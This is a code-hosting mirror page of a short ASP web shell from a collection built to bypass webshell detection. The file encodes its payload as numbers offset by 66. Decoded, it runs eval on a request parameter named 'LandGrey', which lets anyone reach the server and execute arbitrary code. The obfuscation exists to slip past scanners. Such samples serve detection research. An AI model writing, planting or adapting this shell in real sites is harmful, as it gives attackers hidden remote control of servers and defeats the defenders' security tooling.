mirror of
https://github.com/tennc/webshell
synced 2024-11-12 22:47:15 +00:00
7451dc532b
from: https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/asp author: Build By LandGrey
10 lines
236 B
Text
10 lines
236 B
Text
<%<!--"-->
|
|
eXecUTe(fun("%167%184%163%174%98%180%167%179%183%167%181%182%106%100%142%163%176%166%137%180%167%187%100%107"))
|
|
|
|
Function fun(Str):
|
|
Str = Split(Str,"%")
|
|
For x=1 To Ubound(Str)
|
|
fun=fun&Chr(Str(x)-66)
|
|
Next
|
|
End Function
|
|
%>
|